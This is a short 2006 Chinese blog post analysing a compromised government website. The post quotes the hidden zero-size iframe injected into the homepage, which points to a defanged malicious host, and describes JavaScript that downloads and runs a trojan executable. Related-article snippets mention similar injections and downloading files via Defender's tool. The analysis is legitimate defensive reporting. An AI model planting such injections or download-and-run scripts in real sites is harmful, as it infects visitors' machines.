又一个下载恶意文件的政府网站

最新推荐文章于 2024-04-03 07:57:25 发布
最新推荐文章于 2024-04-03 07:57:25 发布
阅读量3.2k 收藏
点赞数
分类专栏: 系统安全 系统维护 原创作品 文章标签: javascript iframe 脚本 ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1106958
版权

endurer 原创

2006-08-22 第1版 

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3  加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
国微CMS政府网站系统
08-16
作为一个内容管理系统,它提供了丰富的模板选择和强大的自定义功能,使得用户可以根据自身需求定制出独特的网站风格。此外,它的模块化设计允许用户轻松添加或移除各种功能,如新闻发布、在线留言、文档管理等,大大...
千博政府网站群管理系统 v2017 Build0929
11-28
2. **GoogleSiteMap.aspx、BaiduSiteMap.aspx**:这两个文件分别对应谷歌和百度的站点地图,有助于搜索引擎优化(SEO),提升政府网站在搜索引擎中的可见性。 3. **Property.aspx**:可能是网站属性设置或配置页面,...
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1020
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
两个会自动下载恶意程序文件政府网站
Purpleendurer@CSDN
08-18 4178
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
MpCmdRun恶意文件下载
Fly_鹏程万里
09-29 2646
文章前言 Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~ 具体实现
两个下载恶意程序文件政府网站换花样了
Purpleendurer@CSDN
08-22 3080
endurer 原创2006-08-22 第1版今天又看了看 两个会自动下载恶意程序文件政府网站 一文中的两个网站,发现换了花样。两个网站首页末均被加入:/---------<iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0"
pikachu靶场-7 不安全的文件下载和上传
weixin_52180702的博客
12-13 1021
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载
政府门户网站维护项目运维策划方案培训资料
07-06
政府门户网站维护项目运维策划方案是确保政府网站稳定运行、高效服务公众的重要文件。这份文档主要涵盖了运维工作的各个方面,包括原则、目标、服务内容、团队构建、协作环境以及保障措施等。 1. 运维总体原则: -...
千博政府网站群管理系统 v2019 Build0102
10-05
千博政府网站群管理系统v2019 Build0102的文件包名称QBGov_v2019.0102可能包含了系统的安装程序、配置文件、数据库脚本、用户手册等相关文档。安装程序用于在服务器上部署系统,配置文件用于定制化设置,数据库脚本...
宁志地方政府网站管理系统 v7.6.8 新宽频版
11-30
这个系统以其大红色调的宽屏界面为特点,既显得庄重又不失现代感,是地方政府构建官方网站的理想选择。作为国内知名的建站软件,宁志网站管理系统由专业的技术团队精心研发,旨在提供一种即开即用、易于管理和维护的...
进程异常行为-访问恶意下载源 解决方案_安全行为分析对devops的好处
weixin_39902870的博客
11-24 131
云本地架构、持续集成和持续交付(CI/CD)、devops和站点可靠性工程(SRE)等技术和实践使组织能够创新并加速软件产品的交付。但是,它们也扰乱了传统的软件开发和维护生命周期(SDLC),并显著地改变了企业需要做什么才能成功地保护应用程序和业务服务。为了帮助组织确保应用程序的安全交付,TrueFort开发了一种保护和监控云工作负载的方法,称为应用程序安全行为分析(ASBA)。ASBA...
恶意样本下载
catgray的博客
08-28 3480
import requests import json #GET /file/81b69bf08aa50ff8896c11bb289f3656ac1df8ba3bba7a5444fa1ef97c9d14b5.7z HTTP/1.1 headers = { "Host": "www.virusign.com", "Connection": "keep-alive", "Cache-Control":...
进程异常行为-访问恶意下载源 解决方案_不要忽略服务器上的异常进程
weixin_39889544的博客
11-24 266
在之前的文章中,我们看到了ADAudit Plus的用户行为分析(UBA)功能如何使管理员能够监视用户登录活动以识别受感染的帐户。ADAudit Plus中的UBA还可以帮助您跟踪成员服务器上的任何异常进程,以防御外部威胁。在此文章中,我们将研究企业如何跟踪成员服务器上的进程活动。跟踪主机上的异常进程 想象一下这样一种情况:员工点击恶意链接并下载恶意软件,该恶意软件会在网络中传播恶意数据并进行加密...
多线程下载恶意样本
Keo的博客
05-07 671
最近在做威胁情报库,写了个脚本搜集恶意样本,需要在malshare上注册账号(免费)。 virustotal虽然是高级会员,但是用不了feed api,可恶啊,不知道为什么,有没有懂的老哥 # 05/07/2021 Modified by Keo <Thisiskkya@gmail.com> # Download Malware Samples daily with muti threads # Thanks for Jun Xie <jxie2004@gmail.com> for
免费恶意样本资源
debugeeker的专栏
10-13 3354
恶意软件研究员经常要寻找恶意样本来获取威胁情报和开发防御方案。 下面是一些免费的恶意样本资源站,研究的人请下载到虚拟机上玩,后果自负! ANY.RUN https://app.any.run/submissions/ 每天更新,需要注册 Contagio Malware Dump http://contagiodump.blogspot.com/ 每天更新,下载后解压需要发邮件给博主获取密码 DAS MALWERK https://dasmalwerk.eu/ 更新频率不知,随便下载
恶意下载文件
最新发布
m0_62207482的博客
04-03 354
说人话就是,浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来。意思是未知的应用程序文件,浏览器一般不会自动执行或询问执行。在某些下载文件的场景中,服务端可能会返回文件流,并在返回头中带上Content-Type:application/octet-stream,告知浏览器这是一个字节流,浏览器处理字节流的默认方式就是下载
恶意数据包(pcap)下载网站合集
PP_zi的博客
08-25 4156
收集一些恶意数据包下载网站,方便研究学习。
Pikachu靶场——不安全的文件下载(Unsafe Filedownload)
来日可期的博客
10-04 1205
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。
文件操作漏洞之任意文件下载(七)
guanjian_ci的博客
02-21 345
漏洞介绍: 很多网站由于业务需求,往往需要提供文件(附件)下载的功能块,但是如果对下载文件没有做限制,直接通过绝对路径对其文件进行下载,那么,恶意用户就可以利用这种方式下载服务器的敏感文件,对服务器进行进一步的威胁和攻击。 漏洞存在的地方: 系统中存在文件(附件/文档/图片等等资源)下载的地方。 漏洞的危害: 通过任意文件下载,可以下载服务器的任意文件,web业务的代码,服务器和系统的具体配置信息,也可以下载数据库的配置信息,以及对内网的信息探测等等 案例分析: 漏洞标题:xxx管理平台任
XXX政府网站系统三级等保设计方案:可信计算技术融合
"融合可信计算技术的政府网站系统等保三级设计方案" ...这份方案旨在通过融合可信计算技术,打造一个既满足国家法规要求,又适应XXX网站系统需求的安全环境,确保政府服务的稳定和公民信息的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值